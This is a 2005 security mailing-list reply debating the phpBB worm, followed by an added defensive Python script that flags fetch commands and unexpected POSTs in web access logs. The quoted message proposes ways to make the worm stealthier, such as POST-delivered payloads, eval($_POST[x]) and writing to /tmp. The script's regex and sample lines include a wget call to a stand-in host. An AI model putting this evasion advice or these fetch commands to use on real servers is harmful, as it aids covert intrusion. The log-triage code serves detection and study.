Full Disclosure mailing list archives
Re: phpBB Worm writers are dumb
From: Stian Øvrevåge <sovrevage () gmail com>
Date: Tue, 4 Jan 2005 08:47:32 +0100
On Mon, 3 Jan 2005 17:40:28 +0100, EmirAga <emiraga () emiraga com> wrote:
> lots has passed since releasing a phpbb worm by some stupid people, i will list my opinion about it.
>
> - why release a worm? not sure about newer ones, but first one did not do anything, so, what's the point? Worm will warn whole world about vulnerability and most of servers will patch it, without worm it would stay just another bug in their forum and most non will worry about it. Security _penetators_ are losing their jobs because of you.

So, releasing a worm that does nothing but warn the world and getting the holes patched? I would agree this is stupid from a black-hat's point of view, but I think it's better that some kiddies exploit and expose the vuln/exploit than some organized criminals. Have you ever done something for the kick of it? The message I'm replying to now, is there a point? Except saying they are stupid?

> - first worm sent a thousand requests before infection. The newer one does 'wget' it from static http location. STUPID. Simply worm could send itself by POST or FILE_UPLOAD method since they are not written in logs. In logs would be written a small request that most administrators will not notice. what's wrong with eval($_POST[x])?

It is possible for the authors to replace the scripts and hence, load different payloads as time goes, it hasn't been done, but it is a possibility. I would say this is harder with self-carrying code.

> - first worm wrote itself to current directory, we all know that in most cases this will fail. Better solution would be to write to /tmp, or even better to use upload $_FILES[worm][tmp_name]. So stupid!
> - Why didn't they remove comments and replace their variables with smaller ones, so worm will go faster.

Agree with this one, it's not very "nice" code to look at, especially when it's in some strange foreign language.

> i just hope no one will rewrite its code with newer _version_ cuz then i will be the stupid one here. just wanted to say that worm writing sucks and real programmer will never release one. greets

I myself am fascinated by worms, but then again I'm not a real programmer.

My two cents
- Stian

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
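
The logging point argued over in this thread, seen from the log reader's side, as an added example that is not part of either poster's message: a common/combined-format access log records the request line but not the request body, so a fetch command in a query string is visible while a POST leaves only its method, path, status and size. The paths in `EXPECTED_POST`, the hosts and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Common/combined log format: the request line is recorded, the request body is not.
LOG_RE = re.compile(
    r'\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A download command followed by a URL inside a (decoded) query string.
FETCH_RE = re.compile(r'\b(?:wget|curl|fetch|lwp-download)\b[^&]*?https?://', re.I)
# Assumption: scripts on this hypothetical site that legitimately receive POSTs.
EXPECTED_POST = {"/forum/posting.php", "/forum/login.php"}

def decode(value, rounds=3):
    """Undo up to `rounds` layers of URL encoding (query strings may be double-encoded)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def triage(lines):
    """Return (line_number, finding) pairs for access-log lines worth a second look."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if match is None:
            findings.append((number, "unparsed"))
            continue
        path, _, query = match["target"].partition("?")
        if FETCH_RE.search(decode(query)):
            findings.append((number, "fetch-command-in-query"))
        elif match["method"] == "POST" and path not in EXPECTED_POST:
            # Whatever was sent is invisible here; only method, path, status and size remain.
            findings.append((number, "post-body-not-logged"))
    return findings

# Constructed sample lines (documentation addresses and .test hosts), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [04/Jan/2005:08:00:01 +0100] "GET /forum/index.php HTTP/1.1" 200 5120',
    '192.0.2.77 - - [04/Jan/2005:08:00:05 +0100] "GET /forum/index.php?q=wget%20http://files.example.test/a HTTP/1.0" 200 312',
    '192.0.2.10 - - [04/Jan/2005:08:00:09 +0100] "POST /forum/posting.php HTTP/1.1" 302 0',
    '192.0.2.77 - - [04/Jan/2005:08:00:12 +0100] "POST /forum/index.php HTTP/1.0" 200 41',
    '192.0.2.78 - - [04/Jan/2005:08:00:15 +0100] "GET /forum/index.php?q=wget%2520http%253A%252F%252Ffiles.example.test%252Fa HTTP/1.0" 200 312',
]

if __name__ == "__main__":
    for number, finding in triage(SAMPLE):
        print(number, finding)
```

Seeing what a flagged POST actually carried needs request-body capture configured separately (for example ModSecurity audit logging), since the access log cannot supply it.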